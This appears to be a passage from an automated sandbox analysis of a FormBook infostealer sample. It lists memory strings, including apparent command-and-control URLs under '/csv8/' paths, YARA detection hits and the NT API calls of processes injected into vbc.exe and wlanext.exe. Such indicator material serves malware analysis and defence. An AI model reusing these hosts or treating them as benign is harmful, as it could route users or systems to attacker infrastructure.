            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.magenx2.infoReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.masterzushop.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.masterzushop.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.masterzushop.com/csv8/www.aldanasanchezmx.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.masterzushop.comReferer:
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.scheherazadelegault.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.scheherazadelegault.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.scheherazadelegault.com/csv8/www.starrockindia.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.scheherazadelegault.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.starrockindia.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.starrockindia.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.starrockindia.com/csv8/www.studentdividers.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.starrockindia.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.studentdividers.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.studentdividers.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.studentdividers.com/csv8/www.epicmassiveconcepts.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.studentdividers.comReferer:
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.thedigitalsatyam.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.thedigitalsatyam.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.thedigitalsatyam.com/csv8/www.herbmedia.net
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.thedigitalsatyam.comReferer:
            Source: explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.yyyut6.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.yyyut6.com/csv8/
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.yyyut6.com/csv8/www.alparmuhendislik.com
            Source: explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpString found in binary or memory: http://www.yyyut6.comReferer:
            Source: JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://cpanel.hostinger.com
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/hostinger/banners/master/hostinger_welcome/images/hostinger-dragon
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/hostinger/banners/master/hostinger_welcome/images/hostinger-logo.p
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26575989-44
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.hostinger.com/
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.hostinger.com/affiliate-program
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.hostinger.com/blog/
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.hostinger.com/knowledge-base
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.hostinger.com/make-money-online
            Source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpString found in binary or memory: https://www.hostinger.com/tutorials
            Source: JAAkR51fQY.exe, 00000000.00000002.228113773.0000000000EDA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004181C0 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00418270 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004182F0 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004183A0 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004181BA NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041826A NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056FAD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F95F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056FA770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056FA710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F96D0 NtCreateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F99D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056FB040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F98A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056FA3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056F9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02ECA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02ECB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02ECA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02ECA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02ECAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_007181C0 NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_00718270 NtReadFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_007182F0 NtClose,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_007183A0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_007181BA NtCreateFile,
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_0071826A NtReadFile,
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01121068
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_011222A0
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_011204E0
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01121820
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01124048
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01121067
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01125208
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01122290
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01125440
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_011256F0
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01121811
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_011258E8
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_01124BB0
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_0792158A
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_07922D38
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_07922D2A
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_09C4F278
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_0A3B4BB8
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 0_2_0A3B1B71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041B8A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041C23F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041C2AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041C3DF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00408C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041CC13
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041B4A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041BD9B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041BE60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041C603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05781D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056B0D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05782D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057825DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E2581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577D466
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056C841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05781FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578DFCE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D6E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577D616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05782EF7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D4120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056BF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056D99BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0578E824
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DA830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05771002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057828EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056E20A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057820A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056CB090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056DAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05782B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0577DBD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057703DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_056EEBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0576FA2B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_057822AE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F522AE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F3FA2B
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4DBD2
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F403DA
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBEBB0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAAB40
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F52B28
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F528EC
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB20A0
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F520A8
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9B090
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F5E824
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAA830
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F41002
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA4120
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8F900
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F52EF7
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA6E30
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4D616
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F51FF1
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F5DFCE
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4D466
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9841F
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9D5E0
